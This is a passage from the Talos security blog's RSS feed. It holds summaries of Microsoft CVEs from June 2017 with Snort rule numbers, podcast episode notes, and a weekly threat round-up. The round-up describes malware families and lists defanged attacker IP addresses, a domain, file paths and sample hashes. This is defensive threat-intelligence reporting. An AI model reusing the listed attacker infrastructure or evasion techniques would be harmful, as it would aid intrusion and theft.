id="h.r3dx3kkvmfcz"&gt;CVE-2017-8493&lt;/h4&gt;This is a security feature bypass vulnerability that exists when Microsoft Windows fails to enforce case sensitivity for certain variable checks. This could result in an attacker being able to set variables that are either read-only or require authentication. This can be exploited by an attacker executing a specially crafted application to bypass UEFI variable security in Windows.&lt;br /&gt;&lt;h4 id="h.p3llcf1m8rq5"&gt;CVE-2017-8494&lt;/h4&gt;This is a privilege escalation vulnerability related to improper object handling in memory in Windows Secure Kernel Mode. This can be exploited by a locally-authenticated attacker executing a specially crafted application.&lt;br /&gt;&lt;h4 id="h.6462oxbspxq3"&gt;CVE-2017-8507&lt;/h4&gt;This is a remote code execution vulnerability in Microsoft Outlook related to parsing of specially crafted email messages. This vulnerability is triggered when Microsoft Outlook processes a specially crafted message that allows script execution. This can be exploited by opening a specially crafted email message.&lt;br /&gt;&lt;h4 id="h.y14yeg9hmtps"&gt;CVE-2017-8508&lt;/h4&gt;This is a security feature bypass vulnerability in Microsoft Office related to the improper handling of the parsing of file formats. The vulnerability by itself does not allow arbitrary code execution, but could be used in conjunction with another vulnerability to take advantage of the security feature bypass to execute arbitrary code. This can be exploited by having a user open a specially crafted file.&lt;br /&gt;&lt;h4 id="h.kqtny2lmhpy4"&gt;CVE-2017-8509 / CVE-2017-8510 / CVE-2017-8511 / CVE-2017-8512 / CVE-2017-8513&lt;/h4&gt;These are remote code execution in Microsoft Office related to improper handling of objects in memory. Exploitation occurs when a user opens a specially crafted file. This file could be delivered via an email message or be hosted on a website.&lt;br /&gt;&lt;h4 id="h.o1ru3izc54qs"&gt;CVE-2017-8514&lt;/h4&gt;This is a reflective cross site scripting vulnerability in Microsoft SharePoint Server related to improper sanitization of specially crafted requests. This can be exploited by sending a specially crafted request to an affected SharePoint server and will run the script in the security context of the current user. The request could be delivered via both email message or through a specially crafted URL on a website.&lt;br /&gt;&lt;h4 id="h.3mlt339eyw7b"&gt;CVE-2017-8515&lt;/h4&gt;This is a denial of service vulnerability in Microsoft Windows that is triggered when an unauthenticated attacker sends a specially crafted kernel mode request. This attack could cause a denial of service on the target system, requiring a reboot to resolve.&lt;br /&gt;&lt;h4 id="h.z2c1qk9dh3d8"&gt;CVE-2017-8519&lt;/h4&gt;This is a remote code execution vulnerability in Internet Explorer related to the objects in memory are improperly accessed. The resulting corruption of memory can result in arbitrary code execution. This can be exploited by a user visiting a specially crafted webpage.&lt;br /&gt;&lt;h4 id="h.mv8eybhqa5pd"&gt;CVE-2017-8521&lt;/h4&gt;This is a remote code execution vulnerability in Microsoft Edge JavaScript scripting engine related to the way the engine handles objects in memory. The resulting corruption of memory can result in arbitrary code execution. This can be exploited by a user visiting a specially crafted webpage.&lt;br /&gt;&lt;h4 id="h.5ffctj19wxm5"&gt;CVE-2017-8523&lt;/h4&gt;This is a security feature bypass vulnerability in Microsoft Edge related to a failure to correctly apply Same Origin Policy for HTML elements present in other browser windows. This vulnerability could be leveraged to trick a user into loading a page with malicious content when a user visits a specially crafted website.&lt;br /&gt;&lt;h4 id="h.g14jbgu5zebf"&gt;CVE-2017-8529&lt;/h4&gt;This is an information disclosure vulnerability that targets both Internet Explorer and Edge.  The vulnerability resides specifically in print preview and can be triggered by browsing to a specially crafted URL.&lt;br /&gt;&lt;h4 id="h.e6il8xov2qu5"&gt;CVE-2017-8530&lt;/h4&gt;This is a security feature bypass vulnerability in Microsoft Edge related to a failure to correctly enforce Same Origin Policies potentially allowing an attacker to access information from origins outside of the current one. This vulnerability could be leveraged to trick a user into loading a page with malicious content when a user visits a specially crafted website.&lt;br /&gt;&lt;h4 id="h.yo9w4ohnsd64"&gt;CVE-2017-8531 / CVE-2017-8532 / CVE-2017-8533&lt;/h4&gt;These are information disclosure vulnerabilities in the Windows CDI component related to improper disclosure of the contents of its memory. They can be exploited by having a user open a specially crafted document or visit an untrusted webpage.&lt;br /&gt;&lt;h4 id="h.i2sjbys230jf"&gt;CVE-2017-8534&lt;/h4&gt;This is an information disclosure vulnerability in Windows Uniscribe related to the improper disclosure of the contents of its memory. There are multiple ways to exploit this vulnerability including having the user open a specially crafted document of having them visit an untrusted webpage.&lt;br /&gt;&lt;h4 id="h.1jm00kmnvkvp"&gt;CVE-2017-8544&lt;/h4&gt;This is an information disclosure vulnerability in Windows Search related to improper handling of objects in memory. This can be exploited by an attacker sending a specially crafted SMB message to the Windows Search service.&lt;br /&gt;&lt;h4 id="h.x5xrllpbrgrq"&gt;CVE-2017-8545&lt;/h4&gt;This is a spoofing vulnerability in Microsoft Office for Mac related to the improper sanitization of html or treat it in a safe manner. This can be exploited by sending an email with specific HTML tags that display a malicious authentication prompt and could provide the attacker a user's authentication information or login credentials.&lt;br /&gt;&lt;h4 id="h.vm3l0n9yt3yj"&gt;CVE-2017-8547&lt;/h4&gt;This is a remote code execution vulnerability in Internet Explorer related to improper access of objects in memory. The vulnerability could result in corrupt memory that can be leveraged to execute arbitrary code. Exploitation can occur by having a user view a specially crafted website.&lt;br /&gt;&lt;h4 id="h.ifsntniixnev"&gt;CVE-2017-8550&lt;/h4&gt;This is a remote code execution vulnerability in Skype for Business and Microsoft Lync Servers related to a failure to properly sanitize specially crafted content. An authenticated attacker could leverage this vulnerability to execute HTML and JavaScript content in the Skype for Business of Lync context including opening a web page using the default browser or opening another messaging session with another user. Exploitation would require an attacker to invite a user to an instant message session and then send a message that contains specially crafted JavaScript content.&lt;br /&gt;&lt;h4 id="h.5idaqenq3iuk"&gt;CVE-2017-8551&lt;/h4&gt;This is a privilege escalation vulnerability in SharePoint Server related to the improper sanitization of a specially crafted web request. Successful exploitation could result in cross-site scripting attacks on affected systems and the script running in the security context of the current user. Exploitation occurs by an authenticated attacker sending a specially crafted request to an affected SharePoint Server.&lt;br /&gt;&lt;h4 id="h.dazxtzgr79i4"&gt;CVE-2017-8555&lt;/h4&gt;This is a security feature bypass vulnerability in Microsoft Edge related to improper validation of specially crafted documents in the Edge Content Security Policy. This vulnerability could be leveraged to trick a user into loading a web page with malicious content. Exploitation occurs through a user viewing a specially crafted webpage.&lt;br /&gt;&lt;h3 id="h.x43pguv8bvah"&gt;Coverage&lt;/h3&gt;In response to these bulletin disclosures, Talos is releasing the following rules to address these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Management Center or Snort.org.&lt;br /&gt;&lt;br /&gt;Snort Rules:&lt;br /&gt;17042&lt;br /&gt;24500&lt;br /&gt;43155-43166&lt;br /&gt;43169-43176&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=FtF1o6PBkRM:WE1LfzY7Ugo:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/FtF1o6PBkRM" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-06-13T16:50:20.978-04:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/06/ms-tuesday.html</feedburner:origLink></item><item><title>BWT EP6: Enter the Talos, But Please Use a Unique Password</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/7o8j6in7k8I/bwt-ep6-enter-talos-but-please-use.html</link><author>noreply@blogger.com (Mitch Neff)</author><pubDate>Tue, 13 Jun 2017 13:05:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-5419674200920519271</guid><description>&lt;br /&gt;&lt;h4&gt;LISTEN HERE:&lt;/h4&gt;Listen via &lt;a href="https://itunes.apple.com/us/podcast/beers-with-talos-podcast/id1236329410"&gt;iTunes&lt;/a&gt;&lt;br /&gt;Listen directly on the &lt;a href="https://www.talosintelligence.com/podcasts"&gt;Talos Podcasts&lt;/a&gt; page.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-VO1MwKSiMRM/WUBDawHg2eI/AAAAAAAAAII/xdw7Jf0Fh5M0xh5ZG5wd3n1C_ByQunDJACLcBGAs/s1600/facebook_timeline_podcast.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="630" data-original-width="1200" src="https://4.bp.blogspot.com/-VO1MwKSiMRM/WUBDawHg2eI/AAAAAAAAAII/xdw7Jf0Fh5M0xh5ZG5wd3n1C_ByQunDJACLcBGAs/s1600/facebook_timeline_podcast.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;h3&gt;Episode Notes:&lt;a name='more'&gt;&lt;/a&gt;&lt;/h3&gt;The team discusses how to get into threat intel and join a team like Talos. There are many routes to enter the Talos, but no exits. Seriously, they won’t let me leave. Passwords, vaults, and other access controls are discussed more in-depth as well. &lt;br /&gt;Mitch opens the show discussing poor life choices like drinking with folks from Norn Iron, Nigel divulges details of his life-long obsession with men in shorts, Matt forces his team to endure war games in suburban Baltimore, Joel threatens to have a mental breakdown over buzzwords, and Craig turns his roundtable segment into a full topic...shocking, I know.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;Feedback question:&amp;nbsp;&lt;/h4&gt;What SHOULD Nigel be tweeting?&lt;br /&gt;Tweet us &lt;a href="http://twitter.com/talossecurity" target="_blank"&gt;@TalosSecurity&lt;/a&gt;, or email us at &lt;a href="mailto:BeersWithTalos@cisco.com"&gt;BeersWithTalos@cisco.com&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;h3&gt;Topic Table:&lt;/h3&gt;12:50 - How do you get into Security research &lt;br /&gt;16:14 - Being more than wizards in hoodies&lt;br /&gt;22:30 - Who effing tweeted that?&lt;br /&gt;33:11 - Internet of Broken Things&lt;br /&gt;37:33 - Better Passwords, Managers, and TFA - tips, tricks, and tirades&lt;br /&gt;55:33 - Parting shots and pithy quotables&lt;br /&gt;&lt;br /&gt;==========&lt;br /&gt;&lt;h4&gt;Featuring:&amp;nbsp;&lt;/h4&gt;&lt;div&gt;&lt;a href="http://twitter.com/Security_Craig" target="_blank"&gt;Craig Williams&lt;/a&gt;, &lt;a href="http://tiwtter.com/JoelEsler" target="_blank"&gt;Joel Esler&lt;/a&gt;, &lt;a href="http://twitter.com/kpyke" target="_blank"&gt;Matt Olney&lt;/a&gt;,&amp;nbsp;and &lt;a href="http://twitter.com/EnglishLFC" target="_blank"&gt;Nigel Houghton&lt;/a&gt;&lt;br /&gt;Hosted by &lt;a href="http://twitter.com/MitchNeff" target="_blank"&gt;Mitch Neff&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;Find all episodes:&lt;/h4&gt;&lt;a href="http://cs.co/talospodcast"&gt;http://cs.co/talospodcast&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;Subscribe via iTunes (and leave a review!)&lt;/h4&gt;&lt;a href="http://cs.co/talositunes%C2%A0" target="_blank"&gt;http://cs.co/talositunes&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;Subscribe to the Threat Source newsletter:&lt;/h4&gt;&lt;a href="http://cs.co/talosupdate"&gt;http://cs.co/talosupdate&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;Follow Talos on Twitter:&lt;/h4&gt;&lt;a href="http://cs.co/talostwitter"&gt;http://cs.co/talostwitter&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;Give us your feedback and suggestions for topics:&lt;/h4&gt;&lt;a href="mailto:beerswithtalos@cisco.com" target="_blank"&gt;beerswithtalos@cisco.com &lt;/a&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=7o8j6in7k8I:UdYrZcrc3aQ:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/7o8j6in7k8I" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-06-13T16:07:54.609-04:00</atom:updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://4.bp.blogspot.com/-VO1MwKSiMRM/WUBDawHg2eI/AAAAAAAAAII/xdw7Jf0Fh5M0xh5ZG5wd3n1C_ByQunDJACLcBGAs/s72-c/facebook_timeline_podcast.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/06/bwt-ep6-enter-talos-but-please-use.html</feedburner:origLink></item><item><title>Threat Round-up for June 2 - June 9</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/PiuJF_Sg6Qw/threat-roundup-0602-0609.html</link><category>AMP</category><category>Coverage</category><category>Snort</category><category>Threat Round-up</category><category>Umbrella</category><author>noreply@blogger.com (Alexander Chiu)</author><pubDate>Fri, 09 Jun 2017 11:41:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-4898150231893747583</guid><description>Today, Talos is publishing a glimpse into the most prevalent threats we've observed between June 02 and June 09. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.&lt;br /&gt;&lt;br /&gt;As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;This week's most prevalent threats are:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Win.Dropper.PonyVariant-6326202-1&lt;/b&gt;&lt;br /&gt;Dropper&lt;br /&gt;This dropper launches some malware possibly based on leaked  Pony Loader source code. It attempts to avoid detection by injecting twice and deleting itself with cmd.exe process. It also contacts compromised WordPress websites to download additional files and attempts to also steal FTP login credentials&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Doc.Macro.Valyria.6327969.0&lt;/b&gt;&lt;br /&gt;VB Macro&lt;br /&gt;This detects the initial stage of the Valyria trojan. Detecting the macro used and distributed in Microsoft Office Word documents will prevent the trojan's data stealing capabilities.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Trojan.Loader-6328419-0&lt;/b&gt;&lt;br /&gt;Trojan&lt;br /&gt;This malware is of the trojan and downloader family and installs additional malware. It also looks to be able to perform spying operations. It's injecting itself, injecting a new explorer process as well. It's containing a lot of anti-debugging, VM detection  and other protections.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Trojan.Sivis-1&lt;/b&gt;&lt;br /&gt;File infector&lt;br /&gt;Sivis is a file infector that will replace any file in the file system by executable files containing copies of itself.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Worm.Fadok-6328944-0&lt;/b&gt;&lt;br /&gt;Worm&lt;br /&gt;Win.Worm.Fadok drops several files. %AppData%\RAC\mls.exe or %AppData%\RAC\svcsc.exe are instances of the malware which are auto-started when Windows starts. Further, the worm drops and opens a Word document. It connects to the domain wxanalytics[.]ru.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Trojan.Qakbot-6327689-0&lt;/b&gt;&lt;br /&gt;Trojan&lt;br /&gt;Qakbot is a sophisticated trojan primarily targetting personal information like banking credentials. Read more about it in our blog &lt;a href="http://blog.talosintelligence.com/2016/04/qbot-on-the-rise.html"&gt;post&lt;/a&gt;.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Doc.Downloader.Generic-6327950-1&lt;/b&gt;&lt;br /&gt;Doc downloader&lt;br /&gt;As document based downloaders continue to remain popular as a preferred method of delivering malware, we continue to see their obfuscation methods change gears. Recently, we encountered a series of Doc downloaders that used two scripts to download the final binary. The first consists of an embedded macro that is used to remove a widely used obfuscation delimiter &amp;amp; write the resulting JS code to disk. The JS code is then executed via WScript.exe to download the binary, but static analysis remains deterred as most of the code gets processed by a string deobfuscation function relying on single character lookups from a master string.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Trojan.Keybase-6328970-0&lt;/b&gt;&lt;br /&gt;Trojan&lt;br /&gt;KeyBase is a trojan that can be used to capture screenshots, keystrokes, and other pieces of system information&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Trojan.Siggen-6261194-0&lt;/b&gt;&lt;br /&gt;Trojan&lt;br /&gt;Siggen is a malware family with anti-debugging and anti-VM capibilities to hinder static and dynamic analysis. The samples drops a file in a temporary directory that is deleted once it is loaded and the second stage executed.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Image.Dropper.PhishingLure&lt;/b&gt;&lt;br /&gt;Social engineering document technique&lt;br /&gt;These documents display an icon and text lure to encourage users to click and activate the icon. When triggering the icon the malicious code is activated.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;hr /&gt;&lt;h2&gt;Threats&lt;/h2&gt;&lt;h3&gt;Win.Dropper.PonyVariant-6326202-1&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;compromized website="" wordpress=""&gt;/images/wp/wp[.]php&lt;/compromized&gt;&lt;/li&gt;&lt;li&gt;&lt;compromized website="" wordpress=""&gt;/wp-includes/images/wp/wp[.]php&lt;/compromized&gt;&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;47c916890c345a0588e52cc29e6488b5c709217823b0049a46b9a9e5e07a6efb&lt;/li&gt;&lt;li&gt;50733aaab0b6ca4210df15017f51bb576c84fea2cbeb0912dd40a32056cd3c1b&lt;/li&gt;&lt;li&gt;4fe60f488f45f914edb650cc2e248d156ad8b257b610ad4848b1c245f38053e3&lt;/li&gt;&lt;li&gt;24558ad4b3a745c24a2dd42c73800ccfcd0c10dc17c67d83f3dcb3a4e479d46c&lt;/li&gt;&lt;li&gt;21b260fc6d38b2061263f66f3efd71116adbc75b95f57d424b079ecc1c4e5a02&lt;/li&gt;&lt;li&gt;c35c5adf85410ad3a90804dfe053a0b6f53bef8c024898361a6c931c3598317e&lt;/li&gt;&lt;li&gt;416d71ce82336aa2dda064e6ba93a555ccf46c7ae2ad1faba379513965d9d485&lt;/li&gt;&lt;li&gt;81ee12d8f93c5b7574a1d797261f275e9b61f5ebd73ac836a68df3a18ef31c93&lt;/li&gt;&lt;li&gt;b42d5092e2fa54a8312c4f534b9c1d10ff714241a8fc3e3a3f44c8870a1fdc4f&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-f2fIc_wdSiA/WTrPRvTFc-I/AAAAAAAABC4/iKtoO4gmZwoxMzb698dCf9DljSxk-U60gCLcB/s1600/no-umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://2.bp.blogspot.com/-f2fIc_wdSiA/WTrPRvTFc-I/AAAAAAAABC4/iKtoO4gmZwoxMzb698dCf9DljSxk-U60gCLcB/s1600/no-umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-_WiQLJmoLaU/WTrUUOopCZI/AAAAAAAABDI/6cKOa29-4ogllZQHg-2sAuG-UOUd_AS8QCLcB/s1600/47c916890c345a0588e52cc29e6488b5c709217823b0049a46b9a9e5e07a6efb_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="273" src="https://3.bp.blogspot.com/-_WiQLJmoLaU/WTrUUOopCZI/AAAAAAAABDI/6cKOa29-4ogllZQHg-2sAuG-UOUd_AS8QCLcB/s400/47c916890c345a0588e52cc29e6488b5c709217823b0049a46b9a9e5e07a6efb_amp.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-nqvv5qFpo7Y/WTrUW8G7_yI/AAAAAAAABDM/OTnmyXX8dBQdiPlrXj9rpieqZlYDw64PgCLcB/s1600/47c916890c345a0588e52cc29e6488b5c709217823b0049a46b9a9e5e07a6efb_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1059" data-original-width="1237" height="341" src="https://1.bp.blogspot.com/-nqvv5qFpo7Y/WTrUW8G7_yI/AAAAAAAABDM/OTnmyXX8dBQdiPlrXj9rpieqZlYDw64PgCLcB/s400/47c916890c345a0588e52cc29e6488b5c709217823b0049a46b9a9e5e07a6efb_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Doc.Macro.Valyria.6327969.0&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;185[.]165[.]29[.]36&lt;/li&gt;&lt;li&gt;52[.]173[.]193[.]166&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%TEMP%\CVR9C14.tmp.cvr&lt;/li&gt;&lt;li&gt;\Users\Administrator\Documents\20170605\PowerShell_transcript.PC.Wu4ufN69.20170605030528.txt&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;097de8a240500e67ed2b1b0d8d95a4bcd8f07764c5abdcf7eceb17d15c592611&lt;/li&gt;&lt;li&gt;0cfe5dfa2b53c51076a5ea1aac89e7be91e83a70c6438b037dfd00ccd839ca6f&lt;/li&gt;&lt;li&gt;17b965a0cf6b0b316da2c659ec2c7bbe747819d09c1c1401d5a80272f47b813a&lt;/li&gt;&lt;li&gt;1fa78675658b45f99b1799c11681b3f5b7ec09881f3f600060576b4b0a74a65e&lt;/li&gt;&lt;li&gt;2378d2f333b50cc341e08f574d300ebcf12ee7140cb897620bc9c35f93929854&lt;/li&gt;&lt;li&gt;24384267829131c7158c50c109afea6026d327c65a66ef559a6540c2c8863094&lt;/li&gt;&lt;li&gt;2669d31701a90345db7492bc3de46db51af6a9137ce1bafdab2fd3122d2e040e&lt;/li&gt;&lt;li&gt;27a035174244dd347ee81cc932fccf414b1c32a0820fe6a55e242ee04e9c0686&lt;/li&gt;&lt;li&gt;2a3a0eea64d407c04bf65c3bd1b22c4243435d8b066e44011d1a9904f0f644e7&lt;/li&gt;&lt;li&gt;2de9f4f8df35ca71c1738d22bfb6a147670c25dcbe2014cfd0870a53e33f385a&lt;/li&gt;&lt;li&gt;38e71cd7dba75c6e6dbfa326843d10421d57ab3781c94c1174cfc260c86d4361&lt;/li&gt;&lt;li&gt;3d93b69809ad4d6cb2866583c7fc0144aa0db167fd4940ab17b3252c809bf1d1&lt;/li&gt;&lt;li&gt;3ea1c668e2b904c00f60d3bdd735a31261c49b29a39f2523c03271328a69c580&lt;/li&gt;&lt;li&gt;3f3adeed33a1a057f697c49f9d776c27c7fb9afb7cfa62eec2936ac24ae0d19d&lt;/li&gt;&lt;li&gt;4914a3125bf4d54a07ade2109325a324f813c500a5b6e8a2781b7c1876671455&lt;/li&gt;&lt;li&gt;556556a774b187d2068e8d6e4cc2d098fd06fe146e0b4578b68a602d9b9c47f7&lt;/li&gt;&lt;li&gt;56e76f857ba0006ce64a71404b3a5e0166659e069c7d31d488de248e3e8a7af4&lt;/li&gt;&lt;li&gt;5cc180f858ed3148aad169790640664280c4b908867256f7b1a0718575192c78&lt;/li&gt;&lt;li&gt;67e2d24be65f338f944eda6cffdda8013147088a8173e771795b399c3c182771&lt;/li&gt;&lt;li&gt;6b6221926ec36c928f0d0eef2d254766f30342714c3e791645d97c6c86cec31f&lt;/li&gt;&lt;li&gt;73b30d45b7f7a0893f8d8a1b3b55f10ff9d11e86619dccbb22a60d1f2462d5f6&lt;/li&gt;&lt;li&gt;7cc61b02a664bfdeb11daf0dbb6f7bcfa2b07291b4ba3d25e902850a76f91ded&lt;/li&gt;&lt;li&gt;7ec2376443a777c789d853489ba4192ff21923ab95f4810660faad4dd93e0813&lt;/li&gt;&lt;li&gt;7fcd49ea71363a666377a734b80c7608842a9acb868e1b35a3820a1eefd68975&lt;/li&gt;&lt;li&gt;900f2319a95ec33f4c42a4ceac088f0ab940aa0cde64c4da186b0322746d3e36&lt;/li&gt;&lt;li&gt;913b51d636924dc67655ac2bb69449858448f71363eafcd3cb7881da3fe12994&lt;/li&gt;&lt;li&gt;95fd8ea6a9b5778a75b76804ae8c1da2514239598edd1c324f25eb30a93fd715&lt;/li&gt;&lt;li&gt;a3905f5dd2e106d19e260b36d9bdc7946cc8aae0f4343e8d6c7f671d0bdc7921&lt;/li&gt;&lt;li&gt;a57fe946d0e6d5324080ad9625ed5f4cc2720c53cfa8dfc4185cecc9320c8e45&lt;/li&gt;&lt;li&gt;ac1803de8dea5bca07b2eb654f0ce9b013285686014483e6c81ae7235b68e1aa&lt;/li&gt;&lt;li&gt;b08b5eb8f5ab0a2fa8acebaf86bf48653f38b7efed83d88ba6076f0da4af9ace&lt;/li&gt;&lt;li&gt;bb4e1f338f6d5c46d7890aa7eabe929de1467d8760a463c74379d651600638e8&lt;/li&gt;&lt;li&gt;be53a9f3aeca760dfcea58b676db1f687f238e0c6996ec57e36fa6040f43e75e&lt;/li&gt;&lt;li&gt;c3ffe88841a13a6222d667cb7aca8e0d77215b875403f4865ebf199ef64baf9f&lt;/li&gt;&lt;li&gt;c571b06649be9a8d07ae380a7131dd8deba1bee2aa7067557857fee8cbd2c130&lt;/li&gt;&lt;li&gt;ceb3fd6d517aaff2a122df2f9e8ab368cbf1efc8644344d4f228198e90c56399&lt;/li&gt;&lt;li&gt;d6d05984c0d493eb75861c7d56c2cf649fcc912134e7df2894fc8bb3eec8980f&lt;/li&gt;&lt;li&gt;d845e07f961afb0341e8d8da25fc08896bccd09ccc5136e74454308c9f95eff6&lt;/li&gt;&lt;li&gt;e618d44cf1e7d121c9e934b1d530ebc4e830d1dd7d8228ac5b53a455def791a9&lt;/li&gt;&lt;li&gt;e90846bb4883914000462df105e679bc4ad05d3d1b0900363dd18eba1aca5c33&lt;/li&gt;&lt;li&gt;eaa3cb0af249967c7d9a66185db3cac7e93196da6281014206b6d0bc0fb7f34c&lt;/li&gt;&lt;li&gt;ef6269b66111c365ef251e4128a286e16c972359ca406a02b6f81fa8b55b1cda&lt;/li&gt;&lt;li&gt;efb1be187c1b7cb674f6912ceec3301da0cc5c993dc3d7d47f4fa7b9c5e80d1b&lt;/li&gt;&lt;li&gt;f6650409983332866425e807dedc231b28a7cd3a468fe9e17be029fda17efe15&lt;/li&gt;&lt;li&gt;fbdee3574019ef790ca4609c0414bf63da402c051351552e3a24f4e325e494e2&lt;/li&gt;&lt;li&gt;ff9b033e0f4d48b6f77ae849cf3a94ea411583ea8c232b1da6fd1bc99d5e40d4&lt;/li&gt;&lt;li&gt;fff62aadd6740b7c1a4b57758f95d5de0cc36e471e6d1ae40ca8141a5845a7eb&lt;/li&gt;&lt;/ul&gt;&lt;br 